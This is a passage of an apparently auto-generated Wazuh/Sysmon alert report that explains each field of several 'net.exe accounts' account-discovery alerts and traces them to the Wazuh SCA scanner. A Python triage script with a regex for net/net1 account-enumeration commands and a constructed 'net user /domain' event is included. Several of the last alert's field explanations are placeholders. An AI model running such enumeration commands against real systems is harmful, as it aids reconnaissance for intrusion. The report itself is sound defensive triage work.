data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account the parent runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
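The triage the alert record alone cannot do: link the net1.exe event to its net.exe parent and on to whatever launched net.exe, then decide whether the chain ends in the Wazuh SCA scanner. This is an added example, not part of SOCscribe or Wazuh. It uses the four EID 1 messages from this report, trimmed to the fields it reads, plus one constructed interactive event for contrast. The ‘benign’ verdict rests on the assumption that wazuh-agent.exe under the ossec-agent directory is the legitimate agent; verify that binary’s hash separately, since the hashes in the alerts cover only net.exe and net1.exe.

```python
import re
from typing import Dict, List

# The four Sysmon Event ID 1 messages from the alerts in this report, cut down
# to the fields the triage reads; the values are the ones recorded above.
REPORT_EVENTS = [
    r"Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.769 "
    r"ProcessGuid: {94294ddc-be35-680a-080c-000000000e00} ProcessId: 10112 "
    r"Image: C:\Windows\SysWOW64\net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts "
    r"CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM "
    r"ParentProcessGuid: {94294ddc-be35-680a-060c-000000000e00} ParentProcessId: 4616 "
    r"ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts "
    r"ParentUser: NT AUTHORITY\SYSTEM",
    r"Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.841 "
    r"ProcessGuid: {94294ddc-be35-680a-090c-000000000e00} ProcessId: 15044 "
    r"Image: C:\Windows\SysWOW64\net.exe CommandLine: net.exe accounts "
    r"CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM "
    r"ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 "
    r"ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe "
    r'ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" '
    r"ParentUser: NT AUTHORITY\SYSTEM",
    r"Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.928 "
    r"ProcessGuid: {94294ddc-be35-680a-0b0c-000000000e00} ProcessId: 12868 "
    r"Image: C:\Windows\SysWOW64\net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts "
    r"CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM "
    r"ParentProcessGuid: {94294ddc-be35-680a-090c-000000000e00} ParentProcessId: 15044 "
    r"ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts "
    r"ParentUser: NT AUTHORITY\SYSTEM",
    r"Process Create: RuleName: - UtcTime: 2025-04-24 22:41:58.002 "
    r"ProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00} ProcessId: 9516 "
    r"Image: C:\Windows\SysWOW64\net.exe CommandLine: net.exe accounts "
    r"CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM "
    r"ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 "
    r"ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe "
    r'ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" '
    r"ParentUser: NT AUTHORITY\SYSTEM",
]

# Constructed, not from the report: the same kind of command from a user's shell.
INTERACTIVE_EVENT = (
    r"Process Create: RuleName: - UtcTime: 2025-04-24 23:05:12.000 "
    r"ProcessGuid: {00000000-0000-0000-0000-000000000001} ProcessId: 4242 "
    r"Image: C:\Windows\System32\net.exe CommandLine: net user /domain "
    r"CurrentDirectory: C:\Users\jdoe\ User: LAB\jdoe "
    r"ParentProcessGuid: {00000000-0000-0000-0000-000000000002} ParentProcessId: 4000 "
    r"ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: cmd.exe ParentUser: LAB\jdoe"
)

_FIELD_NAMES = [
    "RuleName", "UtcTime", "ProcessGuid", "ProcessId", "Image", "FileVersion",
    "Description", "Product", "Company", "OriginalFileName", "CommandLine",
    "CurrentDirectory", "User", "LogonGuid", "LogonId", "TerminalSessionId",
    "IntegrityLevel", "Hashes", "ParentProcessGuid", "ParentProcessId",
    "ParentImage", "ParentCommandLine", "ParentUser",
]
_FIELD_RE = re.compile(r"(?<![A-Za-z])(" + "|".join(_FIELD_NAMES) + r"): ")

# net / net1 with an account-enumeration subcommand (T1087-style use of net.exe).
ACCOUNT_DISCOVERY = re.compile(
    r"(?<![\w.])net1?(?:\.exe)?\s+(?:accounts|user|group|localgroup)\b", re.I)
# Assumed legitimate scanner: the agent binary recorded as parent in the alerts above.
SCA_SCANNER = "\\ossec-agent\\wazuh-agent.exe"


def parse_sysmon_process_create(message: str) -> Dict[str, str]:
    """Split a flattened Sysmon EID 1 message into its 'Name: value' fields."""
    body = message.split("Process Create: ", 1)[1]
    parts = _FIELD_RE.split(body)  # ['', name, value, name, value, ...]
    return {parts[i]: parts[i + 1].strip() for i in range(1, len(parts), 2)}


def load_tree(messages: List[str]) -> Dict[str, Dict[str, str]]:
    """Index events by ProcessGuid so parents can be resolved by GUID, not PID."""
    return {ev["ProcessGuid"]: ev for ev in map(parse_sysmon_process_create, messages)}


def ancestry(tree: Dict[str, Dict[str, str]], guid: str) -> List[str]:
    """Image paths from the process up through every ancestor we hold an event for.
    When the parent's own EID 1 is missing, the child's recorded ParentImage is
    appended last, so the chain still names who launched it."""
    chain: List[str] = []
    seen = set()
    ev = tree[guid]
    while True:
        chain.append(ev["Image"])
        seen.add(ev["ProcessGuid"])
        parent = tree.get(ev["ParentProcessGuid"])
        if parent is None or parent["ProcessGuid"] in seen:
            chain.append(ev["ParentImage"])
            return chain
        ev = parent


def triage(tree: Dict[str, Dict[str, str]], guid: str) -> str:
    ev = tree[guid]
    if not ACCOUNT_DISCOVERY.search(ev["CommandLine"]):
        return "not-account-discovery"
    root = ancestry(tree, guid)[-1].lower()
    cwd = ev["CurrentDirectory"].lower().rstrip("\\")
    if (root.endswith(SCA_SCANNER) and ev["User"].upper() == "NT AUTHORITY\\SYSTEM"
            and cwd.endswith("\\ossec-agent")):
        return "benign-sca-scan"
    if root.endswith("\\net.exe"):
        # Only the net.exe -> net1.exe hop is visible; fetch the parent's EID 1 by GUID.
        return "unresolved-parent"
    return "investigate"


def triage_all(messages: List[str]) -> Dict[str, str]:
    """Verdict per ProcessId for every event in the batch."""
    tree = load_tree(messages)
    return {ev["ProcessId"]: triage(tree, guid) for guid, ev in tree.items()}


if __name__ == "__main__":
    for pid, verdict in triage_all(REPORT_EVENTS + [INTERACTIVE_EVENT]).items():
        print(pid, verdict)
```

The net1.exe event from this alert (PID 10112) comes back ‘unresolved-parent’ because the EID 1 for its parent net.exe (PID 4616) is not in the batch; the later net1.exe (PID 12868) clears as ‘benign-sca-scan’ only because its parent’s event (PID 15044, launched by wazuh-agent.exe) is present. Suppression keyed on the command line alone would also silence the constructed `net user /domain` from cmd.exe, which is why the verdict is tied to the resolved parent chain, user and working directory together.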

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.207+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery. Here the parent is wazuh-agent.exe itself, running as SYSTEM from its own install directory, i.e. the Wazuh SCA scan issuing `net.exe accounts` for its password‑policy checks (the failed check 26003 above lists that command). Benign unless the agent binary is in doubt: verify its hash and install path rather than chasing the net.exe child.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.207+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2205637
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event; a Sysmon event, so eventID is a Sysmon ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon’s registered provider GUID.

data.win.system.eventID:  1
Sysmon Event ID 1 = Process Create (not a Security‑log ID such as 4688).

data.win.system.version:  5
Schema version of this event type.

data.win.system.level:  4
ETW level 4 = Informational; every Sysmon process creation is logged at this level.

data.win.system.task:  1
Sysmon task category; mirrors the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.8470037Z
When the endpoint wrote the event (UTC). About 2.4 s before `timestamp` above – agent‑to‑manager latency.

data.win.system.eventRecordID:  288473
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the created process.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in.

data.win.system.computer:  Attacker
Hostname stamped on the event; matches agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.841 ProcessGuid: {94294ddc-be35-680a-090c-000000000e00} ProcessId: 15044 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
Sysmon’s rendered Process Create message; the data.win.eventdata.* fields below are parsed from it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.841
Process creation time (UTC) recorded by Sysmon.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-090c-000000000e00}
Sysmon’s unique process identifier. This net.exe is the parent of the net1.exe in the next alert (its parentProcessGuid is this value); the be35-680a groups encode the start time 2025‑04‑24 22:41:57Z.

data.win.eventdata.processId:  15044
PID of the new process; prefer processGuid for correlation because PIDs are recycled.

data.win.eventdata.image:  C:\Windows\SysWOW64\net.exe
Full path of the executable. The 32‑bit SysWOW64 copy is expected because the 32‑bit Wazuh agent launched it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version string from the PE resource (Windows 11 24H2 / Server 2025 build line).

data.win.eventdata.description:  Net Command
Description from the PE version resource; a hint, not proof of authenticity.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource.

data.win.eventdata.originalFileName:  net.exe
Name compiled into the PE resource; matches the image name, so the binary was not renamed.

data.win.eventdata.commandLine:  net.exe accounts
Full command line – the exact command listed in data.sca.check.command of the SCA alert above.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory: the Wazuh agent’s install folder.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as; the agent service context.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon identifier of the SYSTEM logon session from the last boot.

data.win.eventdata.logonId:  0x3e7
0x3e7 (999) is the well‑known SYSTEM logon session.

data.win.eventdata.terminalSessionId:  0
Session 0 = services; no interactive user.

data.win.eventdata.integrityLevel:  System
Integrity level of the process token.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
SHA256 of net.exe on disk; compare with a known‑good copy of the same build.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
Sysmon GUID of the parent. Its ea88-67fe groups put the agent’s start roughly nine days before these events – a long‑running service, not something just dropped.

data.win.eventdata.parentProcessId:  3244
PID of the parent at creation time.

data.win.eventdata.parentImage:  C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
The Wazuh agent launched net.exe: this is the SCA scanner running its check, which is what makes the alert benign. Verify this binary’s hash and path if you need certainty.

data.win.eventdata.parentCommandLine:  "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
Parent’s command line – the agent service with no extra arguments.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account the parent runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.217+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery. This net1.exe was spawned by net.exe PID 15044, whose own EID 1 is the previous alert in this report and shows wazuh-agent.exe as its parent. The full chain wazuh-agent.exe → net.exe → net1.exe, as SYSTEM from the ossec-agent directory, is the Wazuh SCA scan running `net.exe accounts`; treat it as benign once that chain is confirmed.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.217+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2210874
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event; a Sysmon event, so eventID is a Sysmon ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon’s registered provider GUID.

data.win.system.eventID:  1
Sysmon Event ID 1 = Process Create (not a Security‑log ID such as 4688).

data.win.system.version:  5
Schema version of this event type.

data.win.system.level:  4
ETW level 4 = Informational; every Sysmon process creation is logged at this level.

data.win.system.task:  1
Sysmon task category; mirrors the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.9354713Z
When the endpoint wrote the event (UTC). About 2.3 s before `timestamp` above – agent‑to‑manager latency.

data.win.system.eventRecordID:  288475
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the created process.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in.

data.win.system.computer:  Attacker
Hostname stamped on the event; matches agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.928 ProcessGuid: {94294ddc-be35-680a-0b0c-000000000e00} ProcessId: 12868 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be35-680a-090c-000000000e00} ParentProcessId: 15044 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
Sysmon’s rendered Process Create message; the data.win.eventdata.* fields below are parsed from it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.928
Process creation time (UTC) recorded by Sysmon.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-0b0c-000000000e00}
Sysmon’s unique process identifier; pivot on it for this process’s network, file and child events. The be35-680a groups encode the start time 2025‑04‑24 22:41:57Z.

data.win.eventdata.processId:  12868
PID of the new process; prefer processGuid for correlation because PIDs are recycled.

data.win.eventdata.image:  C:\Windows\SysWOW64\net1.exe
Full path of the executable. net1.exe is the helper net.exe delegates most subcommands to; SysWOW64 because the launcher is 32‑bit.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version string from the PE resource (Windows 11 24H2 / Server 2025 build line).

data.win.eventdata.description:  Net Command
Description from the PE version resource; a hint, not proof of authenticity.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource.

data.win.eventdata.originalFileName:  net1.exe
Name compiled into the PE resource; matches the image name, so the binary was not renamed.

data.win.eventdata.commandLine:  C:\WINDOWS\system32\net1 accounts
Full command line; `accounts` dumps the local password and lockout policy (the T1087 behaviour).

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory: the Wazuh agent’s install folder, inherited from the parent.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as; the agent service context.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon identifier of the SYSTEM logon session from the last boot.

data.win.eventdata.logonId:  0x3e7
0x3e7 (999) is the well‑known SYSTEM logon session.

data.win.eventdata.terminalSessionId:  0
Session 0 = services; no interactive user.

data.win.eventdata.integrityLevel:  System
Integrity level of the process token.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
SHA256 of net1.exe on disk; identical to the hash in the first net1.exe alert above, as expected for the same file.

data.win.eventdata.parentProcessGuid:  {94294ddc-be35-680a-090c-000000000e00}
Sysmon GUID of the parent – the processGuid of the net.exe alert immediately above, which in turn was launched by wazuh-agent.exe.

data.win.eventdata.parentProcessId:  15044
PID of the parent at creation time.

data.win.eventdata.parentImage:  C:\Windows\SysWOW64\net.exe
Executable of the parent; net.exe → net1.exe is the normal hand‑off.

data.win.eventdata.parentCommandLine:  net.exe accounts
Parent’s command line – the same `accounts` query.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account the parent runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.269+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery. As with the earlier net.exe alert, the parent is wazuh-agent.exe running as SYSTEM from its install directory: the Wazuh SCA scan issuing `net.exe accounts` once more for another password‑policy check. Benign once the agent binary is confirmed; the repeated firings within one second reflect the scanner iterating over checks.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.269+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2215933
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event; a Sysmon event, so eventID is a Sysmon ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon’s registered provider GUID.

data.win.system.eventID:  1
Sysmon Event ID 1 = Process Create (not a Security‑log ID such as 4688).

data.win.system.version:  5
Schema version of this event type.

data.win.system.level:  4
ETW level 4 = Informational; every Sysmon process creation is logged at this level.

data.win.system.task:  1
Sysmon task category; mirrors the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:58.0123233Z
When the endpoint wrote the event (UTC). About 2.3 s before `timestamp` above – agent‑to‑manager latency.

data.win.system.eventRecordID:  288479
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the created process.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in.

data.win.system.computer:  Attacker
Hostname stamped on the event; matches agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:58.002 ProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00} ProcessId: 9516 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
Sysmon’s rendered Process Create message; the data.win.eventdata.* fields below are parsed from it. The parent is again wazuh-agent.exe, so this is another SCA‑driven `net.exe accounts`.

data.win.eventdata.utcTime:  2025-04-24 22:41:58.002
Process creation time (UTC) recorded by Sysmon.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0c0c-000000000e00}
Sysmon’s unique process identifier. Note the be36-680a groups: the embedded start time has ticked to 2025‑04‑24 22:41:58Z, one second after the earlier net.exe, matching utcTime.

data.win.eventdata.processId:  9516
PID of the new process; prefer processGuid for correlation because PIDs are recycled.

data.win.eventdata.image:  C:\Windows\SysWOW64\net.exe
Full path of the executable; the 32‑bit copy, launched by the 32‑bit agent.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version string from the PE resource (Windows 11 24H2 / Server 2025 build line).

data.win.eventdata.description:  Net Command
Description from the PE version resource; a hint, not proof of authenticity.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.305+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

